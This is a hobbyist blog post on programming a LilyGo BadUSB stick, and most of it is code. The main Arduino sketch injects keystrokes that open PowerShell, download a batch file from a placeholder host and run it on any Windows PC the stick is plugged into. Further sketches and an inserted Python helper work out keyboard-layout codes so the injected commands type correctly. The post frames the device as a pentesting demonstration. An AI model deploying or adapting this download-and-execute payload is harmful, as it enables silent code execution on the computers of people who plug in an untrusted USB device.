LilyGo BadUSB – project

I have to post this to myself just to get it all together…

So I just got my LilyGo BadUSB going. It was quite a hassle to get commands and special characters working, but now it does.

So the LilyGo USB key is actually an Arduino Leonardo board that can act as a keyboard. It's a tool, I guess, that can be found in many pentesters' backpacks.

My LilyGo does the magic of downloading a script and then running it. I just put together a batch file that in its turn downloads a couple of files, creates a file, and generally spits out a bunch of garbage to show why you should not plug just any USB key into your computer. It works on at least Win7 and Win10.

So what you need to do when you get your LilyGo BadUSB is to install the Arduino IDE to program it. Download it from https://www.arduino.cc/en/software. The setup is pretty straightforward. Open the Tools menu and make sure you select the board as "Arduino Leonardo" and that the port is right.

When all that is set and done, my sketch for my LilyGo is as follows:

#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Beginning the Keyboard stream
  Keyboard.begin();
  delay(2000);

  // Press the GUI key, or the Windows key... same thing, together with 'r' to open the Run box.
  Keyboard.press(KEY_LEFT_GUI); Keyboard.press('r'); Keyboard.releaseAll();
  delay(500);
  // Typing powershell into the Run box
  Keyboard.print("powershell");
  delay(100);
  typeKey(KEY_RETURN);

  // DOWNLOADING ...
  // Special characters are sent as Shift/AltGr plus the US-layout key, or as a
  // raw keycode (0xBA), so that they come out right on a Swedish layout.
  delay(1000);
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("8"); Keyboard.releaseAll();   // (
  Keyboard.print("New/Object System.Net.WebClient");                             // '/' comes out as '-'
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("9"); Keyboard.releaseAll();   // )
  Keyboard.print(".DownloadFile");
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("8"); Keyboard.releaseAll();   // (
  Keyboard.press(0xBA); Keyboard.releaseAll();                                   // '
  Keyboard.print("http");
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("."); Keyboard.releaseAll();   // :
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("77"); Keyboard.releaseAll();  // //
  Keyboard.print("your.own.url.com");
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("7"); Keyboard.releaseAll();   // /
  Keyboard.print("cia.bat");
  Keyboard.press(0xBA); Keyboard.releaseAll();                                   // '
  Keyboard.print(", ");
  Keyboard.press(0xBA); Keyboard.releaseAll();                                   // '
  Keyboard.print("cia.bat");
  Keyboard.press(0xBA); Keyboard.releaseAll();                                   // '
  Keyboard.press(KEY_LEFT_SHIFT); Keyboard.print("9"); Keyboard.releaseAll();   // )
  typeKey(KEY_RETURN);

  // Giving the download process 3 seconds
  delay(3000);

  // Running the downloaded .bat file
  Keyboard.print(".");
  Keyboard.press(KEY_RIGHT_ALT); Keyboard.print("-"); Keyboard.releaseAll();    // AltGr + the '-' key = backslash
  Keyboard.print("cia.bat");
  typeKey(KEY_RETURN);

  // Ending stream
  Keyboard.end();
}

/* Unused endless loop */
void loop() {}

Yes, it's not cleaned up, but it works and it is not hard to understand. Keep reading!

It produces the following when plugged into a Swedish Windows PC:

rpowershell
(New-Object System.Net.WebClient).DownloadFile('http://your.own.url.com/cia.bat', 'cia.bat')
.\cia.bat

The 'r' before powershell is from pressing the Windows key (Win+R), and then it prints powershell, hits Enter, types the command in, and that's it.

The only thing it does is download and run my .bat file from the internet. It's from the .bat file that the show begins. Just use your imagination 😉

The hard part was finding the special characters. I'm working on a Swedish keyboard and the Arduino IDE only works with a US keyboard layout, and the info on getting shit to work in my case (Swedish) was hard to find.

When you start to get the hang of things, how to program your LilyGo with the IDE software, and you realize you are 'up shit creek' because you don't have a US keyboard: don't give up!

Here is a snippet of code to run on your LilyGo to get all the available characters for your keyboard. It has a 7-second delay before it starts, just so you get time to switch to Notepad or whatever text editor you are using.

#include "Keyboard.h"

void setup() {
  Keyboard.begin();
  delay(7000);   // to give you some time to switch to your editor

  Keyboard.print("start");
  Keyboard.write(KEY_RETURN);

  // Keyboard.write() treats values from 0x88 upwards as raw HID keycodes
  // (0x88 + usage code), so this walks usage 0x04..0x37: the letters, digits,
  // Enter/Esc/Backspace/Tab/space and the punctuation keys, each one typed
  // unshifted and then with Shift held. The control keys will mess up the
  // listing a little, just keep reading past them.
  for (int i = 0x04; i < 0x38; i++) {
    int j = i + 0x88;
    Keyboard.print("0x");
    Keyboard.print(j, HEX);     // the code you pass to Keyboard.press()/write()
    Keyboard.print(" ");
    Keyboard.write(j);          // what that key types on your layout

    Keyboard.print("  ");

    Keyboard.press(KEY_LEFT_SHIFT);
    Keyboard.write(j);          // ... and with Shift held
    Keyboard.releaseAll();

    Keyboard.write(KEY_RETURN);
  }
  Keyboard.print("end");
}

void loop() {
}

For example, the last character I was looking for was the ' (single quote).

And the code to send the character ':

Keyboard.press(0xBA);Keyboard.releaseAll();

Just paste it into your IDE software and run it with Notepad or some text editor in front to get the scancodes for your keyboard.
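The two sketches above both lean on one rule of the Arduino Keyboard library: ASCII goes through a built-in US table, and values of 0x88 and up are raw HID usage codes, which is why the same sketch types different things on a US and a Swedish PC. The following Python is an added example, not the post's code, that models that rule (with constructed, partial layout tables and the Arduino convention assumed as stated in the comments) so you can read off what a sketch's Keyboard.* calls will type on a given layout before plugging anything in, and look up a raw code the way the enumeration sketch does.

```python
# Added example, not from the original post: model what an Arduino Keyboard.h
# sketch types on a US versus a Swedish Windows layout. Assumptions: the Arduino
# library treats press()/write() values >= 0x88 as raw HID usage codes (usage =
# value - 0x88) and maps ASCII through its built-in US table; layout tables below
# are constructed and partial; AltGr on a key with no third symbol types nothing.
RAW = 0x88

def layout(shifted_digits, extra):
    # Letters and digits share usage codes on both layouts; only symbols differ.
    t = {0x04 + i: (c, c.upper(), "") for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
    t.update({0x1E + i: (c, s, "") for i, (c, s) in enumerate(zip("1234567890", shifted_digits))})
    t.update({0x2C: (" ", "", ""), 0x36: (",", "", "")})
    t.update(extra)
    return t

# usage -> (plain, shifted, AltGr)
US = layout("!@#$%^&*()", {0x2D: ("-", "_", ""), 0x32: ("\\", "|", ""),
                           0x37: (".", ">", ""), 0x38: ("/", "?", "")})
SE = layout('!"#¤%&/()=', {0x2D: ("+", "?", "\\"), 0x32: ("'", "*", ""),
                           0x37: (".", ":", ""), 0x38: ("-", "_", "")})

# Invert the US table to get the library's ASCII -> (usage, needs_shift) map.
ASCII = {c: (u, sh) for u, (p, s, _) in US.items() for c, sh in ((p, False), (s, True)) if c}

def decode(script, lay):
    """Text typed on layout `lay` by (kind, arg) events: ("print", text),
    ("shift", text), ("altgr", text) or ("raw", code)."""
    out = []
    for kind, arg in script:
        if kind == "raw":
            events = [(arg - RAW, False, False)]
        else:
            events = [(ASCII[c][0], ASCII[c][1] or kind == "shift", kind == "altgr") for c in arg]
        for usage, shift, altgr in events:
            plain, shifted, third = lay[usage]
            out.append(third if altgr else shifted if shift else plain)
    return "".join(out)

def find_raw(ch, lay):
    """(raw code as the enumeration sketch prints it, Shift needed) for `ch`."""
    return next((usage + RAW, ch == s) for usage, (p, s, _) in lay.items() if ch in (p, s))

# The post's DownloadFile and run lines, transcribed from their Keyboard.* calls.
DOWNLOAD_LINE = [("shift", "8"), ("print", "New/Object System.Net.WebClient"),
    ("shift", "9"), ("print", ".DownloadFile"), ("shift", "8"), ("raw", 0xBA),
    ("print", "http"), ("shift", "."), ("shift", "77"), ("print", "your.own.url.com"),
    ("shift", "7"), ("print", "cia.bat"), ("raw", 0xBA), ("print", ", "),
    ("raw", 0xBA), ("print", "cia.bat"), ("raw", 0xBA), ("shift", "9")]
RUN_LINE = [("print", "."), ("altgr", "-"), ("print", "cia.bat")]
```

decode(DOWNLOAD_LINE, SE) reproduces the PowerShell line shown above, while decode(DOWNLOAD_LINE, US) gives the mangled version a US machine would see; find_raw("'", SE) returns (0xBA, False), the code the post found by hand, and the same 0xBA is a backslash on a US layout.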

That's it for tonight.
